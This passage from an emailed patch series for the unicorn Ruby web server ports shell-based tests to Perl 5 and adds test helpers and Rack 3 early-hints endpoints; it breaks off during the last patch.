 3 files changed, 13 insertions(+), 9 deletions(-)

diff --git a/t/active-unix-socket.t b/t/active-unix-socket.t
index 1241904..c132dc2 100644
--- a/t/active-unix-socket.t
+++ b/t/active-unix-socket.t
@@ -20,7 +20,7 @@ my $unix_req = sub {
 	print $fh <<EOM;
 pid "$tmpdir/u.pid"
 listen "$u1"
-stderr_path "$tmpdir/err1.log"
+stderr_path "$tmpdir/err.log"
 EOM
 	close $fh;
 
@@ -113,6 +113,5 @@ is($pidf, $to_kill{u1}, 'pid file contents unchanged after 2nd start failure');
 	ok(-S $u1, 'socket stays after SIGTERM');
 }
 
-my @log = slurp("$tmpdir/err.log");
-diag("@log") if $ENV{V};
+check_stderr;
 done_testing;
diff --git a/t/integration.t b/t/integration.t
index c687655..939dc24 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -246,11 +246,8 @@ EOM
 
 
 undef $ar;
-my @log = slurp("$tmpdir/err.log");
-diag("@log") if $ENV{V};
-my @err = grep(!/NameError.*Unicorn::Waiter/, grep(/error/i, @log));
-is_deeply(\@err, [], 'no unexpected errors in stderr');
-is_deeply([grep(/SIGKILL/, @log)], [], 'no SIGKILL in stderr');
+
+check_stderr;
 
 undef $tmpdir;
 done_testing;
diff --git a/t/lib.perl b/t/lib.perl
index 49632cf..315ef2d 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -11,12 +11,20 @@ use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
 use File::Temp 0.19 (); # 0.19 for ->newdir
 our ($tmpdir, $errfh);
 our @EXPORT = qw(unicorn slurp tcp_server tcp_connect unicorn $tmpdir $errfh
-	SEEK_SET tcp_host_port start_req which spawn);
+	SEEK_SET tcp_host_port start_req which spawn check_stderr);
 
 my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
 $tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
 open($errfh, '>>', "$tmpdir/err.log");
 
+sub check_stderr () {
+	my @log = slurp("$tmpdir/err.log");
+	diag("@log") if $ENV{V};
+	my @err = grep(!/NameError.*Unicorn::Waiter/, grep(/error/i, @log));
+	is_deeply(\@err, [], 'no unexpected errors in stderr');
+	is_deeply([grep(/SIGKILL/, @log)], [], 'no SIGKILL in stderr');
+}
+
 sub tcp_server {
 	my %opt = (
 		ReuseAddr => 1,

[-- Attachment #15: 0014-tests-consistent-tcp_start-and-unix_start-across-Per.patch --]
[-- Type: text/x-diff, Size: 8017 bytes --]

From 0dcd8bd569813a175ad43837db3ab07019a95b99 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:43 +0000
Subject: [PATCH 14/23] tests: consistent tcp_start and unix_start across Perl
 5 tests

I'll be using Unix sockets more in tests since there's no
risk of system-wide conflicts with TCP port allocation.
Furthermore, curl supports `--unix-socket' nowadays; so
there's little reason to rely on TCP sockets and the conflicts
they bring in tests.
---
 t/active-unix-socket.t | 13 ++++---------
 t/integration.t        | 28 ++++++++++++++--------------
 t/lib.perl             | 30 ++++++++++++++++--------------
 3 files changed, 34 insertions(+), 37 deletions(-)

diff --git a/t/active-unix-socket.t b/t/active-unix-socket.t
index c132dc2..8723137 100644
--- a/t/active-unix-socket.t
+++ b/t/active-unix-socket.t
@@ -10,11 +10,6 @@ my %to_kill;
 END { kill('TERM', values(%to_kill)) if keys %to_kill }
 my $u1 = "$tmpdir/u1.sock";
 my $u2 = "$tmpdir/u2.sock";
-my $unix_req = sub {
-	my $s = IO::Socket::UNIX->new(Peer => shift, Type => SOCK_STREAM);
-	print $s @_, "\r\n\r\n";
-	$s;
-};
 {
 	open my $fh, '>', "$tmpdir/u1.conf.rb";
 	print $fh <<EOM;
@@ -53,7 +48,7 @@ is($?, 0, 'daemonized 1st process');
 chomp($to_kill{u1} = slurp("$tmpdir/u.pid"));
 like($to_kill{u1}, qr/\A\d+\z/s, 'read pid file');
 
-chomp(my $worker_pid = readline($unix_req->($u1, 'GET /pid')));
+chomp(my $worker_pid = readline(unix_start($u1, 'GET /pid')));
 like($worker_pid, qr/\A\d+\z/s, 'captured worker pid');
 ok(kill(0, $worker_pid), 'worker is kill-able');
 
@@ -65,7 +60,7 @@ isnt($?, 0, 'conflicting PID file fails to start');
 chomp(my $pidf = slurp("$tmpdir/u.pid"));
 is($pidf, $to_kill{u1}, 'pid file contents unchanged after start failure');
 
-chomp(my $pid2 = readline($unix_req->($u1, 'GET /pid')));
+chomp(my $pid2 = readline(unix_start($u1, 'GET /pid')));
 is($worker_pid, $pid2, 'worker PID unchanged');
 
 
@@ -73,7 +68,7 @@ is($worker_pid, $pid2, 'worker PID unchanged');
 unicorn('-c', "$tmpdir/u3.conf.rb", @uarg)->join;
 isnt($?, 0, 'conflicting UNIX socket fails to start');
 
-chomp($pid2 = readline($unix_req->($u1, 'GET /pid')));
+chomp($pid2 = readline(unix_start($u1, 'GET /pid')));
 is($worker_pid, $pid2, 'worker PID still unchanged');
 
 chomp($pidf = slurp("$tmpdir/u.pid"));
@@ -101,7 +96,7 @@ is($pidf, $to_kill{u1}, 'pid file contents unchanged after 2nd start failure');
 	chomp($to_kill{u1} = slurp("$tmpdir/u.pid"));
 	like($to_kill{u1}, qr/\A\d+\z/s, 'read pid file');
 
-	chomp($pid2 = readline($unix_req->($u1, 'GET /pid')));
+	chomp($pid2 = readline(unix_start($u1, 'GET /pid')));
 	like($pid2, qr/\A\d+\z/, 'worker running');
 
 	ok(kill('TERM', delete $to_kill{u1}), 'SIGTERM restarted daemon');
diff --git a/t/integration.t b/t/integration.t
index 939dc24..b33e3c3 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -70,7 +70,7 @@ EOM
 my ($c, $status, $hdr);
 
 # response header tests
-$c = start_req($srv, 'GET /rack-2-newline-headers HTTP/1.0');
+$c = tcp_start($srv, 'GET /rack-2-newline-headers HTTP/1.0');
 ($status, $hdr) = slurp_hdr($c);
 like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
 my $orig_200_status = $status;
@@ -89,7 +89,7 @@ SKIP: { # Date header check
 };
 
 
-$c = start_req($srv, 'GET /rack-3-array-headers HTTP/1.0');
+$c = tcp_start($srv, 'GET /rack-3-array-headers HTTP/1.0');
 ($status, $hdr) = slurp_hdr($c);
 is_deeply([ grep(/^x-r3: /, @$hdr) ],
 	[ 'x-r3: a', 'x-r3: b', 'x-r3: c' ],
@@ -97,7 +97,7 @@ is_deeply([ grep(/^x-r3: /, @$hdr) ],
 
 SKIP: {
 	eval { require JSON::PP } or skip "JSON::PP missing: $@", 1;
-	my $c = start_req($srv, 'GET /env_dump');
+	my $c = tcp_start($srv, 'GET /env_dump');
 	my $json = do { local $/; readline($c) };
 	unlike($json, qr/^Connection: /smi, 'no connection header for 0.9');
 	unlike($json, qr!\AHTTP/!s, 'no HTTP/1.x prefix for 0.9');
@@ -107,17 +107,17 @@ SKIP: {
 }
 
 # cf. <CAO47=rJa=zRcLn_Xm4v2cHPr6c0UswaFC_omYFEH+baSxHOWKQ@mail.gmail.com>
-$c = start_req($srv, 'GET /nil-header-value HTTP/1.0');
+$c = tcp_start($srv, 'GET /nil-header-value HTTP/1.0');
 ($status, $hdr) = slurp_hdr($c);
 is_deeply([grep(/^X-Nil:/, @$hdr)], ['X-Nil: '],
 	'nil header value accepted for broken apps') or diag(explain($hdr));
 
 if ('TODO: ensure Rack::Utils::HTTP_STATUS_CODES is available') {
-	$c = start_req($srv, 'POST /tweak-status-code HTTP/1.0');
+	$c = tcp_start($srv, 'POST /tweak-status-code HTTP/1.0');
 	($status, $hdr) = slurp_hdr($c);
 	like($status, qr!\AHTTP/1\.[01] 200 HI\b!, 'status tweaked');
 
-	$c = start_req($srv, 'POST /restore-status-code HTTP/1.0');
+	$c = tcp_start($srv, 'POST /restore-status-code HTTP/1.0');
 	($status, $hdr) = slurp_hdr($c);
 	is($status, $orig_200_status, 'original status restored');
 }
@@ -130,12 +130,12 @@ SKIP: {
 }
 
 if ('bad requests') {
-	$c = start_req($srv, 'GET /env_dump HTTP/1/1');
+	$c = tcp_start($srv, 'GET /env_dump HTTP/1/1');
 	($status, $hdr) = slurp_hdr($c);
 	like($status, qr!\AHTTP/1\.[01] 400 \b!, 'got 400 on bad request');
 
-	$c = tcp_connect($srv);
-	print $c 'GET /';
+	$c = tcp_start($srv);
+	print $c 'GET /';;
 	my $buf = join('', (0..9), 'ab');
 	for (0..1023) { print $c $buf }
 	print $c " HTTP/1.0\r\n\r\n";
@@ -143,7 +143,7 @@ if ('bad requests') {
 	like($status, qr!\AHTTP/1\.[01] 414 \b!,
 		'414 on REQUEST_PATH > (12 * 1024)');
 
-	$c = tcp_connect($srv);
+	$c = tcp_start($srv);
 	print $c 'GET /hello-world?a';
 	$buf = join('', (0..9));
 	for (0..1023) { print $c $buf }
@@ -152,7 +152,7 @@ if ('bad requests') {
 	like($status, qr!\AHTTP/1\.[01] 414 \b!,
 		'414 on QUERY_STRING > (10 * 1024)');
 
-	$c = tcp_connect($srv);
+	$c = tcp_start($srv);
 	print $c 'GET /hello-world#a';
 	$buf = join('', (0..9), 'a'..'f');
 	for (0..63) { print $c $buf }
@@ -173,7 +173,7 @@ SKIP: {
 	my $ck_hash = sub {
 		my ($sub, $path, %opt) = @_;
 		seek($rh, 0, SEEK_SET);
-		$c = tcp_connect($srv);
+		$c = tcp_start($srv);
 		$c->autoflush(0);
 		$PUT{$sub}->($rh, $c, $path, %opt);
 		$c->flush or die $!;
@@ -235,11 +235,11 @@ EOM
 	$wpid =~ s/\Apid=// or die;
 	ok(CORE::kill(0, $wpid), 'worker PID retrieved');
 
-	$c = start_req($srv, $req);
+	$c = tcp_start($srv, $req);
 	($status, $hdr) = slurp_hdr($c);
 	like($status, qr!\AHTTP/1\.[01] 200\b!, 'minimal request succeeds');
 
-	$c = start_req($srv, 'GET /xxxxxx HTTP/1.0');
+	$c = tcp_start($srv, 'GET /xxxxxx HTTP/1.0');
 	($status, $hdr) = slurp_hdr($c);
 	like($status, qr!\AHTTP/1\.[01] 413\b!, 'big request fails');
 }
diff --git a/t/lib.perl b/t/lib.perl
index 315ef2d..1d6e78d 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -10,8 +10,8 @@ use IO::Socket::INET;
 use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
 use File::Temp 0.19 (); # 0.19 for ->newdir
 our ($tmpdir, $errfh);
-our @EXPORT = qw(unicorn slurp tcp_server tcp_connect unicorn $tmpdir $errfh
-	SEEK_SET tcp_host_port start_req which spawn check_stderr);
+our @EXPORT = qw(unicorn slurp tcp_server tcp_start unicorn $tmpdir $errfh
+	SEEK_SET tcp_host_port which spawn check_stderr unix_start);
 
 my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
 $tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
@@ -55,26 +55,28 @@ sub tcp_host_port {
 	}
 }
 
-sub tcp_connect {
-	my ($dest, %opt) = @_;
-	my $addr = tcp_host_port($dest);
-	my $s = ref($dest)->new(
+sub unix_start ($@) {
+	my ($dst, @req) = @_;
+	my $s = IO::Socket::UNIX->new(Peer => $dst, Type => SOCK_STREAM) or
+		BAIL_OUT "unix connect $dst: $!";
+	$s->autoflush(1);
+	print $s @req, "\r\n\r\n" if @req;
+	$s;
+}
+
+sub tcp_start ($@) {
+	my ($dst, @req) = @_;
+	my $addr = tcp_host_port($dst);
+	my $s = ref($dst)->new(
 		Proto => 'tcp',
 		Type => SOCK_STREAM,
 		PeerAddr => $addr,
-		%opt,
 	) or BAIL_OUT "failed to connect to $addr: $!";
 	$s->autoflush(1);
+	print $s @req, "\r\n\r\n" if @req;
 	$s;
 }
 
-sub start_req {
-	my ($srv, @req) = @_;
-	my $c = tcp_connect($srv);
-	print $c @req, "\r\n\r\n";
-	$c;
-}
-
 sub slurp {
 	open my $fh, '<', $_[0];
 	local $/;

[-- Attachment #16: 0015-port-t9000-preread-input.sh-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 3856 bytes --]

From 1b8840d8d13491eecd2fa92e06f73c65eadd33ba Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:44 +0000
Subject: [PATCH 15/23] port t9000-preread-input.sh to Perl 5

Stuffing it into t/integration.t for now so we can save on
startup costs.
---
 t/integration.t          | 32 ++++++++++++++++++++++++---
 t/lib.perl               |  2 +-
 t/preread_input.ru       |  4 +---
 t/t9000-preread-input.sh | 48 ----------------------------------------
 4 files changed, 31 insertions(+), 55 deletions(-)
 delete mode 100755 t/t9000-preread-input.sh

diff --git a/t/integration.t b/t/integration.t
index b33e3c3..f5afd5d 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -7,8 +7,8 @@
 
 use v5.14; BEGIN { require './t/lib.perl' };
 use autodie;
-my $srv = tcp_server();
-my $host_port = tcp_host_port($srv);
+our $srv = tcp_server();
+our $host_port = tcp_host_port($srv);
 my $t0 = time;
 my $conf = "$tmpdir/u.conf.rb";
 open my $conf_fh, '>', $conf;
@@ -209,8 +209,34 @@ SKIP: {
 	seek($rh, 0, SEEK_SET);
 	$copt->{0} = $rh;
 	$do_curl->('-T-');
-}
 
+	diag 'testing Unicorn::PrereadInput...';
+	local $srv = tcp_server();
+	local $host_port = tcp_host_port($srv);
+	check_stderr;
+	truncate($errfh, 0);
+
+	my $pri = unicorn(qw(-E none t/preread_input.ru), { 3 => $srv });
+	$url = "http://$host_port/";
+
+	$do_curl->(qw(-T t/random_blob));
+	seek($rh, 0, SEEK_SET);
+	$copt->{0} = $rh;
+	$do_curl->('-T-');
+
+	my @pr_err = slurp("$tmpdir/err.log");
+	is(scalar(grep(/app dispatch:/, @pr_err)), 2, 'app dispatched twice');
+
+	# abort a chunked request by blocking curl on a FIFO:
+	$c = tcp_start($srv, "PUT / HTTP/1.1\r\nTransfer-Encoding: chunked");
+	close $c;
+	@pr_err = slurp("$tmpdir/err.log");
+	is(scalar(grep(/app dispatch:/, @pr_err)), 2,
+			'app did not dispatch on aborted request');
+	undef $pri;
+	check_stderr;
+	diag 'Unicorn::PrereadInput middleware tests done';
+}
 
 # ... more stuff here
 
diff --git a/t/lib.perl b/t/lib.perl
index 1d6e78d..b6148cf 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -79,7 +79,7 @@ sub tcp_start ($@) {
 
 sub slurp {
 	open my $fh, '<', $_[0];
-	local $/;
+	local $/ if !wantarray;
 	readline($fh);
 }
 
diff --git a/t/preread_input.ru b/t/preread_input.ru
index 79685c4..f0a1748 100644
--- a/t/preread_input.ru
+++ b/t/preread_input.ru
@@ -1,8 +1,6 @@
 #\-E none
 require 'digest/sha1'
 require 'unicorn/preread_input'
-use Rack::ContentLength
-use Rack::ContentType, "text/plain"
 use Unicorn::PrereadInput
 nr = 0
 run lambda { |env|
@@ -13,5 +11,5 @@
     dig.update(buf)
   end
 
-  [ 200, {}, [ "#{dig.hexdigest}\n" ] ]
+  [ 200, {}, [ dig.hexdigest ] ]
 }
diff --git a/t/t9000-preread-input.sh b/t/t9000-preread-input.sh
deleted file mode 100755
index d6c73ab..0000000
--- a/t/t9000-preread-input.sh
+++ /dev/null
@@ -1,48 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-t_plan 9 "PrereadInput middleware tests"
-
-t_begin "setup and start" && {
-	random_blob_sha1=$(rsha1 < random_blob)
-	unicorn_setup
-	unicorn  -D -c $unicorn_config preread_input.ru
-	unicorn_wait_start
-}
-
-t_begin "single identity request" && {
-	curl -sSf -T random_blob http://$listen/ > $tmp
-}
-
-t_begin "sha1 matches" && {
-	test x"$(cat $tmp)" = x"$random_blob_sha1"
-}
-
-t_begin "single chunked request" && {
-	curl -sSf -T- < random_blob http://$listen/ > $tmp
-}
-
-t_begin "sha1 matches" && {
-	test x"$(cat $tmp)" = x"$random_blob_sha1"
-}
-
-t_begin "app only dispatched twice" && {
-	test 2 -eq "$(grep 'app dispatch:' < $r_err | count_lines )"
-}
-
-t_begin "aborted chunked request" && {
-	rm -f $tmp
-	curl -sSf -T- < $fifo http://$listen/ > $tmp &
-	curl_pid=$!
-	kill -9 $curl_pid
-	wait
-}
-
-t_begin "app only dispatched twice" && {
-	test 2 -eq "$(grep 'app dispatch:' < $r_err | count_lines )"
-}
-
-t_begin "killing succeeds" && {
-	kill -QUIT $unicorn_pid
-}
-
-t_done

[-- Attachment #17: 0016-port-t-t0116-client_body_buffer_size.sh-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 8861 bytes --]

From e9593301044f305d4a0e074f77eea35015ca0ec4 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:45 +0000
Subject: [PATCH 16/23] port t/t0116-client_body_buffer_size.sh to Perl 5

While I'm fine with depending on curl for certain things,
there's no need for it here since unicorn has had lazy
rack.input for over a decade, at this point.
---
 t/active-unix-socket.t                     |  1 +
 t/{t0116.ru => client_body_buffer_size.ru} |  2 -
 t/client_body_buffer_size.t                | 83 ++++++++++++++++++++++
 t/integration.t                            | 10 ---
 t/lib.perl                                 | 12 +++-
 t/t0116-client_body_buffer_size.sh         | 80 ---------------------
 6 files changed, 95 insertions(+), 93 deletions(-)
 rename t/{t0116.ru => client_body_buffer_size.ru} (82%)
 create mode 100644 t/client_body_buffer_size.t
 delete mode 100755 t/t0116-client_body_buffer_size.sh

diff --git a/t/active-unix-socket.t b/t/active-unix-socket.t
index 8723137..4e11837 100644
--- a/t/active-unix-socket.t
+++ b/t/active-unix-socket.t
@@ -109,4 +109,5 @@ is($pidf, $to_kill{u1}, 'pid file contents unchanged after 2nd start failure');
 }
 
 check_stderr;
+undef $tmpdir;
 done_testing;
diff --git a/t/t0116.ru b/t/client_body_buffer_size.ru
similarity index 82%
rename from t/t0116.ru
rename to t/client_body_buffer_size.ru
index fab5fce..44161a5 100644
--- a/t/t0116.ru
+++ b/t/client_body_buffer_size.ru
@@ -1,6 +1,4 @@
 #\ -E none
-use Rack::ContentLength
-use Rack::ContentType, 'text/plain'
 app = lambda do |env|
   input = env['rack.input']
   case env["PATH_INFO"]
diff --git a/t/client_body_buffer_size.t b/t/client_body_buffer_size.t
new file mode 100644
index 0000000..b1a99f3
--- /dev/null
+++ b/t/client_body_buffer_size.t
@@ -0,0 +1,83 @@
+#!perl -w
+# Copyright (C) unicorn hackers <unicorn-public@yhbt.net>
+# License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
+
+use v5.14; BEGIN { require './t/lib.perl' };
+use autodie;
+my $uconf = "$tmpdir/u.conf.rb";
+
+open my $conf_fh, '>', $uconf;
+$conf_fh->autoflush(1);
+print $conf_fh <<EOM;
+client_body_buffer_size 0
+EOM
+my $srv = tcp_server();
+my $host_port = tcp_host_port($srv);
+my @uarg = (qw(-E none t/client_body_buffer_size.ru -c), $uconf);
+my $ar = unicorn(@uarg, { 3 => $srv });
+my ($c, $status, $hdr);
+my $mem_class = 'StringIO';
+my $fs_class = 'Unicorn::TmpIO';
+
+$c = tcp_start($srv, "PUT /input_class HTTP/1.0\r\nContent-Length: 0");
+($status, $hdr) = slurp_hdr($c);
+like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
+is(readline($c), $mem_class, 'zero-byte file is StringIO');
+
+$c = tcp_start($srv, "PUT /tmp_class HTTP/1.0\r\nContent-Length: 1");
+print $c '.';
+($status, $hdr) = slurp_hdr($c);
+like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
+is(readline($c), $fs_class, '1 byte file is filesystem-backed');
+
+
+my $fifo = "$tmpdir/fifo";
+POSIX::mkfifo($fifo, 0600) or die "mkfifo: $!";
+seek($conf_fh, 0, SEEK_SET);
+truncate($conf_fh, 0);
+print $conf_fh <<EOM;
+listen "$host_port" # TODO: remove this requirement for SIGHUP
+after_fork { |_,_| File.open('$fifo', 'w') { |fp| fp.write "pid=#\$\$" } }
+EOM
+$ar->do_kill('HUP');
+open my $fifo_fh, '<', $fifo;
+like(my $wpid = readline($fifo_fh), qr/\Apid=\d+\z/a ,
+	'reloaded w/ default client_body_buffer_size');
+
+
+$c = tcp_start($srv, "PUT /tmp_class HTTP/1.0\r\nContent-Length: 1");
+($status, $hdr) = slurp_hdr($c);
+like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
+is(readline($c), $mem_class, 'class for a 1 byte file is memory-backed');
+
+
+my $one_meg = 1024 ** 2;
+$c = tcp_start($srv, "PUT /tmp_class HTTP/1.0\r\nContent-Length: $one_meg");
+($status, $hdr) = slurp_hdr($c);
+like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
+is(readline($c), $fs_class, '1 megabyte file is FS-backed');
+
+# reload with bigger client_body_buffer_size
+say $conf_fh "client_body_buffer_size $one_meg";
+$ar->do_kill('HUP');
+open $fifo_fh, '<', $fifo;
+like($wpid = readline($fifo_fh), qr/\Apid=\d+\z/a ,
+	'reloaded w/ bigger client_body_buffer_size');
+
+
+$c = tcp_start($srv, "PUT /tmp_class HTTP/1.0\r\nContent-Length: $one_meg");
+($status, $hdr) = slurp_hdr($c);
+like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
+is(readline($c), $mem_class, '1 megabyte file is now memory-backed');
+
+my $too_big = $one_meg + 1;
+$c = tcp_start($srv, "PUT /tmp_class HTTP/1.0\r\nContent-Length: $too_big");
+($status, $hdr) = slurp_hdr($c);
+like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
+is(readline($c), $fs_class, '1 megabyte + 1 byte file is FS-backed');
+
+
+undef $ar;
+check_stderr;
+undef $tmpdir;
+done_testing;
diff --git a/t/integration.t b/t/integration.t
index f5afd5d..855c260 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -15,16 +15,6 @@ open my $conf_fh, '>', $conf;
 $conf_fh->autoflush(1);
 my $ar = unicorn(qw(-E none t/integration.ru -c), $conf, { 3 => $srv });
 my $curl = which('curl');
-END { diag slurp("$tmpdir/err.log") if $tmpdir };
-sub slurp_hdr {
-	my ($c) = @_;
-	local $/ = "\r\n\r\n"; # affects both readline+chomp
-	chomp(my $hdr = readline($c));
-	my ($status, @hdr) = split(/\r\n/, $hdr);
-	diag explain([ $status, \@hdr ]) if $ENV{V};
-	($status, \@hdr);
-}
-
 my %PUT = (
 	chunked_md5 => sub {
 		my ($in, $out, $path, %opt) = @_;
diff --git a/t/lib.perl b/t/lib.perl
index b6148cf..2685c3b 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -11,11 +11,12 @@ use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
 use File::Temp 0.19 (); # 0.19 for ->newdir
 our ($tmpdir, $errfh);
 our @EXPORT = qw(unicorn slurp tcp_server tcp_start unicorn $tmpdir $errfh
-	SEEK_SET tcp_host_port which spawn check_stderr unix_start);
+	SEEK_SET tcp_host_port which spawn check_stderr unix_start slurp_hdr);
 
 my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
 $tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
 open($errfh, '>>', "$tmpdir/err.log");
+END { diag slurp("$tmpdir/err.log") if $tmpdir };
 
 sub check_stderr () {
 	my @log = slurp("$tmpdir/err.log");
@@ -25,6 +26,15 @@ sub check_stderr () {
 	is_deeply([grep(/SIGKILL/, @log)], [], 'no SIGKILL in stderr');
 }
 
+sub slurp_hdr {
+	my ($c) = @_;
+	local $/ = "\r\n\r\n"; # affects both readline+chomp
+	chomp(my $hdr = readline($c));
+	my ($status, @hdr) = split(/\r\n/, $hdr);
+	diag explain([ $status, \@hdr ]) if $ENV{V};
+	($status, \@hdr);
+}
+
 sub tcp_server {
 	my %opt = (
 		ReuseAddr => 1,
diff --git a/t/t0116-client_body_buffer_size.sh b/t/t0116-client_body_buffer_size.sh
deleted file mode 100755
index c9e17c7..0000000
--- a/t/t0116-client_body_buffer_size.sh
+++ /dev/null
@@ -1,80 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-t_plan 12 "client_body_buffer_size settings"
-
-t_begin "setup and start" && {
-	unicorn_setup
-	rtmpfiles unicorn_config_tmp one_meg
-	dd if=/dev/zero bs=1M count=1 of=$one_meg
-	cat >> $unicorn_config <<EOF
-after_fork do |server, worker|
-  File.open("$fifo", "wb") { |fp| fp.syswrite "START" }
-end
-EOF
-	cat $unicorn_config > $unicorn_config_tmp
-	echo client_body_buffer_size 0 >> $unicorn_config
-	unicorn -D -c $unicorn_config t0116.ru
-	unicorn_wait_start
-	fs_class=Unicorn::TmpIO
-	mem_class=StringIO
-
-	test x"$(cat $fifo)" = xSTART
-}
-
-t_begin "class for a zero-byte file should be StringIO" && {
-	> $tmp
-	test xStringIO = x"$(curl -T $tmp -sSf http://$listen/input_class)"
-}
-
-t_begin "class for a 1 byte file should be filesystem-backed" && {
-	echo > $tmp
-	test x$fs_class = x"$(curl -T $tmp -sSf http://$listen/tmp_class)"
-}
-
-t_begin "reload with default client_body_buffer_size" && {
-	mv $unicorn_config_tmp $unicorn_config
-	kill -HUP $unicorn_pid
-	test x"$(cat $fifo)" = xSTART
-}
-
-t_begin "class for a 1 byte file should be memory-backed" && {
-	echo > $tmp
-	test x$mem_class = x"$(curl -T $tmp -sSf http://$listen/tmp_class)"
-}
-
-t_begin "class for a random blob file should be filesystem-backed" && {
-	resp="$(curl -T random_blob -sSf http://$listen/tmp_class)"
-	test x$fs_class = x"$resp"
-}
-
-t_begin "one megabyte file should be filesystem-backed" && {
-	resp="$(curl -T $one_meg -sSf http://$listen/tmp_class)"
-	test x$fs_class = x"$resp"
-}
-
-t_begin "reload with a big client_body_buffer_size" && {
-	echo "client_body_buffer_size(1024 * 1024)" >> $unicorn_config
-	kill -HUP $unicorn_pid
-	test x"$(cat $fifo)" = xSTART
-}
-
-t_begin "one megabyte file should be memory-backed" && {
-	resp="$(curl -T $one_meg -sSf http://$listen/tmp_class)"
-	test x$mem_class = x"$resp"
-}
-
-t_begin "one megabyte + 1 byte file should be filesystem-backed" && {
-	echo >> $one_meg
-	resp="$(curl -T $one_meg -sSf http://$listen/tmp_class)"
-	test x$fs_class = x"$resp"
-}
-
-t_begin "killing succeeds" && {
-	kill $unicorn_pid
-}
-
-t_begin "check stderr" && {
-	check_stderr
-}
-
-t_done

[-- Attachment #18: 0017-tests-get-rid-of-sha1sum.rb-and-rsha1-sh-function.patch --]
[-- Type: text/x-diff, Size: 1255 bytes --]

From b47912160f2336dde3901e588cc23fb2c2f8d9dc Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:46 +0000
Subject: [PATCH 17/23] tests: get rid of sha1sum.rb and rsha1() sh function

These are no longer needed since Perl has long included
Digest::SHA
---
 t/bin/sha1sum.rb | 17 -----------------
 t/test-lib.sh    |  4 ----
 2 files changed, 21 deletions(-)
 delete mode 100755 t/bin/sha1sum.rb

diff --git a/t/bin/sha1sum.rb b/t/bin/sha1sum.rb
deleted file mode 100755
index 53d68ce..0000000
--- a/t/bin/sha1sum.rb
+++ /dev/null
@@ -1,17 +0,0 @@
-#!/usr/bin/env ruby
-# -*- encoding: binary -*-
-# Reads from stdin and outputs the SHA1 hex digest of the input
-
-require 'digest/sha1'
-$stdout.sync = $stderr.sync = true
-$stdout.binmode
-$stdin.binmode
-bs = 16384
-digest = Digest::SHA1.new
-if buf = $stdin.read(bs)
-  begin
-    digest.update(buf)
-  end while $stdin.read(bs, buf)
-end
-
-$stdout.syswrite("#{digest.hexdigest}\n")
diff --git a/t/test-lib.sh b/t/test-lib.sh
index e70d0c6..8613144 100644
--- a/t/test-lib.sh
+++ b/t/test-lib.sh
@@ -123,7 +123,3 @@ unicorn_wait_start () {
 	# no need to play tricks with FIFOs since we got "ready_pipe" now
 	unicorn_pid=$(cat $pid)
 }
-
-rsha1 () {
-	sha1sum.rb
-}

[-- Attachment #19: 0018-early_hints-supports-Rack-3-array-headers.patch --]
[-- Type: text/x-diff, Size: 4606 bytes --]

From 6ad9f4b54ee16ffecea7e16b710552b45db33a16 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:47 +0000
Subject: [PATCH 18/23] early_hints supports Rack 3 array headers

We can hoist out append_headers into a new method and use it in
both e103_response_write and http_response_write.

t/integration.t now tests early_hints with both possible
values of check_client_connection.
---
 t/integration.ru |  7 +++++++
 t/integration.t  | 47 ++++++++++++++++++++++++++++++++++++++++++-----
 2 files changed, 49 insertions(+), 5 deletions(-)

diff --git a/t/integration.ru b/t/integration.ru
index edc408c..dab384d 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -5,6 +5,11 @@
 # this goes for t/integration.t  We'll try to put as many tests
 # in here as possible to avoid startup overhead of Ruby.
 
+def early_hints(env, val)
+  env['rack.early_hints'].call('link' => val) # val may be ary or string
+  [ 200, {}, [ val.class.to_s ] ]
+end
+
 $orig_rack_200 = nil
 def tweak_status_code
   $orig_rack_200 = Rack::Utils::HTTP_STATUS_CODES[200]
@@ -81,6 +86,8 @@ def rack_input_tests(env)
     when '/env_dump'; [ 200, {}, [ env_dump(env) ] ]
     when '/write_on_close'; write_on_close
     when '/pid'; [ 200, {}, [ "#$$\n" ] ]
+    when '/early_hints_rack2'; early_hints(env, "r\n2")
+    when '/early_hints_rack3'; early_hints(env, %w(r 3))
     else '/'; [ 200, {}, [ env_dump(env) ] ]
     end # case PATH_INFO (GET)
   when 'POST'
diff --git a/t/integration.t b/t/integration.t
index 855c260..8433497 100644
